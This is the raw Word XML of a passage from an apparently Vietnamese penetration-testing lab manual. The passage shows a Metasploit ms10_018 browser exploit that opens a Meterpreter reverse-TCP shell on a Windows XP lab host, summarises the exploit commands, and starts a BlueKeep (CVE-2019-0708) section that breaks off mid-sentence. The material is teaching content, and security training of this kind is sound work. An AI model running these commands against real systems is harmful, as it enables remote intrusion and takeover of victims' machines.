    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="21C7847C" w14:textId="399617EC">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="7871269B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened (192.168.1.10:4141 -&gt; 192.168.1.110:1796) at 2024-08-22 08:55:11 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7871269B" w:rsidP="0E33AEE1" w:rsidRDefault="7871269B" w14:paraId="05E99875" w14:textId="11842CB1">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="7871269B">
        <w:rPr/>
        <w:t>msf6 exploit(windows/browser/ms10_018_ie_behaviors) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="7CF26785" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="0E33AEE1" w:rsidRDefault="00DA3E31" w14:paraId="7A7A51A6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>msf6 exploit(ms10_018_</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>_behaviors) &gt; show sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="419B42B8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="220ED957" w:rsidP="0E33AEE1" w:rsidRDefault="220ED957" w14:paraId="7B530A2C" w14:textId="1C309CFE">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="220ED957">
        <w:drawing>
          <wp:inline wp14:editId="0909467F" wp14:anchorId="01B50BF0">
            <wp:extent cx="5943600" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="448401580" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rc1fd0fe1ee3345c3">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2676525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="0D45003E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="0E33AEE1" w:rsidRDefault="00DA3E31" w14:paraId="2B26FF0D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>msf6 exploit(ms10_018_</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>_behaviors) &gt; sessions -</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E31">
        <w:rPr/>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="121355DD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Starting interaction with 1...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="0AD1C559" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="2C8C9471" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; execute -f cmd.exe -c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="282773DE" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Process 1264 created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="0C94C3B3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="42245868" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter &gt; interact 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="07607855" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Interacting with channel 1...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="1AF51399" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C0074E" w:rsidR="00DA3E31" w:rsidP="00DA3E31" w:rsidRDefault="00DA3E31" w14:paraId="46FD8955" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E33AEE1" w:rsidR="00DA3E31">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>C:\Documents and Settings\11\Desktop&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A7D6E69" w:rsidP="0E33AEE1" w:rsidRDefault="1A7D6E69" w14:paraId="372B465B" w14:textId="3920F1A4">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidR="1A7D6E69">
        <w:drawing>
          <wp:inline wp14:editId="17FE4EC9" wp14:anchorId="24F244D5">
            <wp:extent cx="5943600" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="777386058" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R50de2bbeadb34bb5">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="55C39531" w14:textId="5593C5CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="0FC7F8CB">
        <w:rPr/>
        <w:t>NOTE các lệnh chính</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="48F0FBC6" w14:textId="7FE26B81">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>use windows/browser/ms10_018_</w:t>
      </w:r>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>_behaviors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="59C8BAC7" w14:textId="1DC797AD">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="4D416D00" w14:textId="6AADE475">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="4C939ED8" w14:textId="401B4BF2">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LPORT 4040</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="20A8EC23" w14:textId="3E500D27">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set URIPATH /test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="09FB03E0" w14:textId="5B449057">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0FC7F8CB" w:rsidP="446FC441" w:rsidRDefault="0FC7F8CB" w14:paraId="2C6A3988" w14:textId="251726D1">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="446FC441" w:rsidR="0FC7F8CB">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="3906E026" w14:textId="171134B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc145594628" w:id="29"/>
      <w:r>
        <w:t xml:space="preserve">Tấn công Windows </w:t>
      </w:r>
      <w:r w:rsidR="00486FDA">
        <w:t>XP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="11D5BEB9">
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="5624B0EB">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>2019</w:t>
      </w:r>
      <w:r w:rsidR="7B4A061B">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>0708_bluekeep</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="398A8357" w14:textId="4127A821">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>BlueKeep</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2D5F6B1A">
        <w:rPr/>
        <w:t xml:space="preserve">(CVE-2019-0708) </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>một</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>lỗ</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>hổng</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>thực</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> thi </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>mã</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>từ</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> xa trong </w:t>
      </w:r>
      <w:r w:rsidR="0086604A">
        <w:rPr/>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>ịch</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>vụ</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>kết</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>nối</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0086604A">
        <w:rPr/>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>áy</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>tính</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>từ</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> xa </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> Windows (Windows Remote Desktop Services). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="57D1E6B3" w14:textId="3D541054">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="00486FDA">
        <w:rPr/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>tặc</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>thể</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>sử</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> dụng </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>lỗ</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>hổng</w:t>
      </w:r>
      <w:r w:rsidR="1F75BD96">
        <w:rPr/>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="1F75BD96">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1F75BD96">
        <w:rPr/>
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidR="1F75BD96">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>để</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> phát </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>tán</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>mã</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>độc</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> đào </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>tiền</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>ảo</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve">, trojan ngân </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>hàng</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>hoặc</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>loại</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>mã</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>độc</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>khác</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>mà</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>không</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> cần sự </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>tương</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>tác</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>người</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>dùng</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="2A8C3326" w14:textId="0FE87F4F">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve">Các </w:t>
      </w:r>
      <w:r w:rsidR="3CBA9513">
        <w:rPr/>
        <w:t>HĐH bị</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> ảnh hưởng: Windows 2003, Windows XP, Windows 7, Windows Server 2008, Windows Server 2008 R2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="5F9315A4" w14:textId="32388CCE">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kịch bản: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Máy Kali linux có </w:t>
      </w:r>
      <w:r>
        <w:t>địa chỉ IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">.168.1.10 (LHOST) sẽ tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">ác máy Win </w:t>
      </w:r>
      <w:r>
        <w:t>XP</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
